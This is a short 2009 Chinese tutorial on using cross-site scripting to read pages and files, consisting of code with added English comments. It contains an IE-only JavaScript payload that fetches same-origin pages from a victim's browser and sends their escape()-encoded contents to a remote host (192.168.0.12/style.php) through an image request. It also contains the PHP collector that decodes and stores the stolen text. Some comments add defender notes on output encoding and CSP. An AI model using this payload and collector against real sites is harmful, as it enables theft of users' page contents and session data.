关注+2009-12-14作者:
如何利用 XSS 读取文件和页面内容
js:
// Attaches Internet Explorer's proprietary "#default#Download" behavior to <body>;
// that behavior is what provides the startDownload() method called below.
// addBehavior() and this behavior are legacy IE-only features.
document.body.addBehavior("#default#Download");
// Relative paths the script requests. Being relative, they resolve against the page
// the script was injected into, so the fetches are made from the viewing user's browser.
var mycars = new Array();
mycars[0] = "l.htm";
mycars[1] = "y.htm";
// `x` is not declared with var, so it becomes an implicit global.
for (x in mycars )
{
// startDownload(url, callback) is given GetData as the callback for the fetched text.
// NOTE(review): `source` is not declared anywhere in the code shown; confirm what the
// author expected this direct call to receive.
if(document.body.startDownload(mycars[x],GetData)){
GetData(source);
}
}
// Callback handed to startDownload(): takes the fetched text in `source`,
// encodes it with escape(), and passes the result on to getReaded().
function GetData(source)
{
// No `var`: txt is created as an implicit global. escape() emits %XX / %uXXXX
// sequences, which is the form the PHP unescape() on this page decodes.
txt=escape(source);
getReaded(txt);
}
// Sends `usr` to another host by assigning an Image's src, so the data leaves the
// browser as the `key` query parameter of an ordinary GET request for an "image".
// Defender notes: the root cause is the script-injection point, so context-aware output
// encoding of user-controlled data is the primary fix. In proxy or web logs this shows
// up as an image request to an unexpected host carrying a long, escape()-encoded key=
// value. A Content-Security-Policy img-src restriction closes this channel in browsers
// that enforce CSP.
function getReaded(usr) {
var newimg = new Image();
// The payload is wrapped in two newline characters on each side. The host is a private
// (RFC 1918) address.
newimg.src="http://192.168.0.12/style.php?key="+"\n"+"\n"+usr+"\n"+"\n";
}
php:
<?php
// Declares the response as UTF-8 HTML. The code shown emits no response body itself.
header('Content-Type:text/html;charset=utf-8');
/**
 * Decodes text produced by JavaScript's escape().
 *
 * The input is first passed through rawurldecode(), then split into tokens:
 * "%uXXXX" sequences, "&#xXXXX;" hexadecimal entities, "&#NNN;" decimal entities,
 * and single remaining characters. The three escaped forms are packed into two
 * bytes and converted from UCS-2 to UTF-8; everything else is passed through.
 *
 * Behaviour worth knowing when reading decoded output:
 *  - the pattern has no "s" modifier, so "." never matches a newline and newline
 *    characters in the input do not appear in the result;
 *  - "UCS-2" is given to iconv() without an explicit byte order, so how the two
 *    packed bytes are interpreted is left to the iconv implementation in use;
 *  - the result is untrusted text and must be encoded for whatever context it is
 *    later displayed or stored in.
 *
 * @param string $str escape()-encoded input
 * @return string decoded text
 */
function unescape($str) {
    $decoded = rawurldecode($str);
    preg_match_all("/%u.{4}|&#x.{4};|&#\d+;|.+/U", $decoded, $matches);
    $tokens = $matches[0];

    foreach ($tokens as $index => $token) {
        if (strncmp($token, "%u", 2) === 0) {
            // "%uXXXX": the last four characters are the hex code unit.
            $tokens[$index] = iconv("UCS-2", "UTF-8", pack("H4", substr($token, -4)));
        } elseif (strncmp($token, "&#x", 3) === 0) {
            // "&#xXXXX;": hex digits sit between the "&#x" prefix and the ";".
            $tokens[$index] = iconv("UCS-2", "UTF-8", pack("H4", substr($token, 3, -1)));
        } elseif (strncmp($token, "&#", 2) === 0) {
            // "&#NNN;": decimal value packed as an unsigned 16-bit big-endian integer.
            $tokens[$index] = iconv("UCS-2", "UTF-8", pack("n", substr($token, 2, -1)));
        }
    }

    return implode("", $tokens);
}
// Collection step: decodes whatever arrives in the `key` query parameter and appends
// it to news.html next to this script.
// NOTE(review): the decoded value is written unencoded into a file served as HTML, so
// any browser opening news.html will parse the captured markup. Treat the file as
// untrusted, and view it as plain text or after htmlspecialchars().
// The results of fopen() and fputs() are not checked, and the handle is never closed
// explicitly.
$file = "news.html";
$_GET['key'] = unescape($_GET['key']);
$handle = fopen($file, 'a+');
fputs($handle, $_GET['key']);
?>